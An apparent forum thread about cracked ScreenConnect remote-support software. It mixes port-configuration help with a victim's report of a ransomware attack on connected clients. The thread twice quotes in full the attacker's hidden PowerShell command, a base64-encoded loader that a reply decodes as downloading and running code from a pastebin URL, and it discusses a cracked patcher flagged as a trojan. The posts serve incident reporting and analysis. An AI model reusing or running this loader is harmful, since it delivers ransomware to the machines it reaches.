(Jul 24, 2019, 20:41 pm)iscream Wrote: [ -> ]do i have to add those? The only one i see in there is
<add key="WebServerListenUri" value="http://+:8040/" />
Yes you do have to add those. I found them listed on one of the old forum posts.
Copy mine and add your domain name. Make a backup of the config just in case it gets messed up.
ok so i added them and im still only able to access by specifying the port. anyone have any other ideas?
(Jul 26, 2019, 13:47 pm)iscream Wrote: [ -> ]ok so i added them and im still only able to access by specifying the port. anyone have any other ideas?
Sorry you will only be able to access it by specifying the port.
The default for HTTP is port 80 and the default for HTTPS is 443.
Anything other than those ports will have to be specified.
To be clear my setup is HTTP only and looks like this.v
Code:
<add key="WebServerListenUri" value="http://+:80/" />
<add key="WebServerAddressableUri" value="http://mywebsite.com:80" />
<add key="RelayListenUri" value="relay://+:8080/" />
<add key="RelayAddressableUri" value="relay://mywebsite.com:8080/" />
(Jul 24, 2019, 20:01 pm)iscream Wrote: [ -> ]silly question but how do i get it available over wan not just internal on 8040?
to calrify, domain is up already and can see it but only with mydomain:8040. I want mydomain.com to go straight to it. Ports are forwarded already.
(Jul 26, 2019, 14:33 pm)neweggeek Wrote: [ -> ] (Jul 26, 2019, 13:47 pm)iscream Wrote: [ -> ]ok so i added them and im still only able to access by specifying the port. anyone have any other ideas?
Sorry you will only be able to access it by specifying the port.
The default for HTTP is port 80 and the default for HTTPS is 443.
Anything other than those ports will have to be specified.
To be clear my setup is HTTP only and looks like this.v
Code:
<add key="WebServerListenUri" value="http://+:80/" />
<add key="WebServerAddressableUri" value="http://mywebsite.com:80" />
<add key="RelayListenUri" value="relay://+:8080/" />
<add key="RelayAddressableUri" value="relay://mywebsite.com:8080/" />
Thanks. IDK why but for whatever reason this isnt working. Even on port 80
My screen connect have been hacked and the hacker run a command on all my connected clients
This is the command that have been run
cmd.exe /c START %SystemRoot%\system32\WindowsPowerShell\v1.0\powershell.exe -nop -w hidden -e SQBmACgAJABFAE4AVgA6AFAAUgBPAEMARQBTAFMATwBSAF8AQQBSAEMASABJAFQARQBDAFQAVQBSAEUAIAAtAGMAbwBuAHQAYQBpAG4AcwAgACcAQQBNAEQANgA0ACcAKQB7ACAAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAC0ARgBpAGwAZQBQAGEAdABoACAAIgAkAEUAbgB2ADoAVwBJAE4ARABJAFIAXABTAHkAcwBXAE8AVwA2ADQAXABXAGkAbgBkAG8AdwBzAFAAbwB3AGUAcgBTAGgAZQBsAGwAXAB2ADEALgAwAFwAcABvAHcAZQByAHMAaABlAGwAbAAuAGUAeABlACIAIAAtAGEAcgBnAHUAbQBlAG4AdAAgACIASQBFAFgAIAAoACgAbgBlAHcALQBvAGIAagBlAGMAdAAgAG4AZQB0AC4AdwBlAGIAYwBsAGkAZQBuAHQAKQAuAGQAbwB3AG4AbABvAGEAZABzAHQAcgBpAG4AZwAoACcAaAB0AHQAcABzADoALwAvAHAAYQBzAHQAZQBiAGkAbgAuAGMAbwBtAC8AcgBhAHcALwB0AGkAOQBLAHEAVQBzADkAJwApACkAOwBJAG4AdgBvAGsAZQAtAE4AUABaAFgARwBFAFMAQwBRAEEATgBFADsAUwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBzACAAMQAwADAAMAAwADAAMAA7ACIAfQBlAGwAcwBlAHsAIABJAEUAWAAgACgAKABuAGUAdwAtAG8AYgBqAGUAYwB0ACAAbgBlAHQALgB3AGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AcABhAHMAdABlAGIAaQBuAC4AYwBvAG0ALwByAGEAdwAvAHQAaQA5AEsAcQBVAHMAOQAnACkAKQA7AEkAbgB2AG8AawBlAC0ATgBQAFoAWABHAEUAUwBDAFEAQQBOAEUAOwBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAHMAIAAxADAAMAAwADAAMAAwADsAIAB9AA==
All the files have been encrypted with some kind of ransomware.
How this is possible. Is screen connect vulnerable to this kind of attacks?
(Jul 31, 2019, 04:18 am)trex2002ro Wrote: [ -> ]My screen connect have been hacked and the hacker run a command on all my connected clients
This is the command that have been run
All the files have been encrypted with some kind of ransomware.
How this is possible. Is screen connect vulnerable to this kind of attacks?
If you got the command from the console or logs, they may have compromised the login. Are you using two factor authentication, and are you using a strong password? Like $jNaF5DWp*m@3su#st
What does your activity logs show? Do you know what login was compromised?
Sorry for your loss. Try to figure out what happened and prevent that from happening next time.
That's a base64 encoded command.
its running Invoke-NPZXGESCQANE after 1000000 seconds or 11.5 days.
The file its downloading is from pastebin.com /raw/ti9KqUs9.
Don't run the code unless you want more ransomware.
Hi Arlecho. First I want to thank you for your work, it really is appreciated.
However, I couldn't help but notice that
several antivirus vendors detect your latest patcher as containing a trojan downloader (some claiming this to contain ransomware!). None of the older SC patchers that I've used over the years come up with any virus detections, false or otherwise. I'm well aware that many cracks get flagged as viruses, but no previous SC patcher (that I have) has ever been flagged.
https://www.virustotal.com/gui/file/59a9.../detection
Can you please share with us what tools you are using that might explain this (presumably) false positive virus detection, to give us some additional piece of mind? Can you verify that the distribution last posted has not been tampered with? Thanks again.
(Aug 01, 2019, 23:33 pm)safdcsfasdfgthh Wrote: [ -> ]Hi Arlecho. First I want to thank you for your work, it really is appreciated.
However, I couldn't help but notice that several antivirus vendors detect your latest patcher as containing a trojan downloader (some claiming this to contain ransomware!). None of the older SC patchers that I've used over the years come up with any virus detections, false or otherwise. I'm well aware that many cracks get flagged as viruses, but no previous SC patcher (that I have) has ever been flagged.
https://www.virustotal.com/gui/file/59a9.../detection
Can you please share with us what tools you are using that might explain this (presumably) false positive virus detection, to give us some additional piece of mind? Can you verify that the distribution last posted has not been tampered with? Thanks again.
I'm not much for reading code, but you're welcome to
decompiler the exe and attempt to see what it does. The file is designed with .net 4.7.2, so use a .net decompiler.
https://www.jetbrains.com/decompiler/
Probably just the missing certificate and included libraries, virus vendors block everything that might point to "cracks", "keygens" e.t.c. probably to get a few bucks out of the software vendors. (As this version uses different patching libraries that might also be it).
If you don't trust it just decompile it or run it in a sandbox and verify that it doesn't do anything other than patch a few functions.
(Jul 31, 2019, 04:18 am)trex2002ro Wrote: [ -> ]My screen connect have been hacked and the hacker run a command on all my connected clients
This is the command that have been run
cmd.exe /c START %SystemRoot%\system32\WindowsPowerShell\v1.0\powershell.exe -nop -w hidden -e SQBmACgAJABFAE4AVgA6AFAAUgBPAEMARQBTAFMATwBSAF8AQQBSAEMASABJAFQARQBDAFQAVQBSAEUAIAAtAGMAbwBuAHQAYQBpAG4AcwAgACcAQQBNAEQANgA0ACcAKQB7ACAAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAC0ARgBpAGwAZQBQAGEAdABoACAAIgAkAEUAbgB2ADoAVwBJAE4ARABJAFIAXABTAHkAcwBXAE8AVwA2ADQAXABXAGkAbgBkAG8AdwBzAFAAbwB3AGUAcgBTAGgAZQBsAGwAXAB2ADEALgAwAFwAcABvAHcAZQByAHMAaABlAGwAbAAuAGUAeABlACIAIAAtAGEAcgBnAHUAbQBlAG4AdAAgACIASQBFAFgAIAAoACgAbgBlAHcALQBvAGIAagBlAGMAdAAgAG4AZQB0AC4AdwBlAGIAYwBsAGkAZQBuAHQAKQAuAGQAbwB3AG4AbABvAGEAZABzAHQAcgBpAG4AZwAoACcAaAB0AHQAcABzADoALwAvAHAAYQBzAHQAZQBiAGkAbgAuAGMAbwBtAC8AcgBhAHcALwB0AGkAOQBLAHEAVQBzADkAJwApACkAOwBJAG4AdgBvAGsAZQAtAE4AUABaAFgARwBFAFMAQwBRAEEATgBFADsAUwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBzACAAMQAwADAAMAAwADAAMAA7ACIAfQBlAGwAcwBlAHsAIABJAEUAWAAgACgAKABuAGUAdwAtAG8AYgBqAGUAYwB0ACAAbgBlAHQALgB3AGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AcABhAHMAdABlAGIAaQBuAC4AYwBvAG0ALwByAGEAdwAvAHQAaQA5AEsAcQBVAHMAOQAnACkAKQA7AEkAbgB2AG8AawBlAC0ATgBQAFoAWABHAEUAUwBDAFEAQQBOAEUAOwBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAHMAIAAxADAAMAAwADAAMAAwADsAIAB9AA==
All the files have been encrypted with some kind of ransomware.
How this is possible. Is screen connect vulnerable to this kind of attacks?
This is not the first time I see this. Last 31/July one installation of screenconnect (v19.0) was attacked and all of it's customers were infected with a ransomware, the options "join with options" (to backstage) and run command on remote system should be password protected (I guess they are using that options to infect all the PCs connected).
A bit scared with this...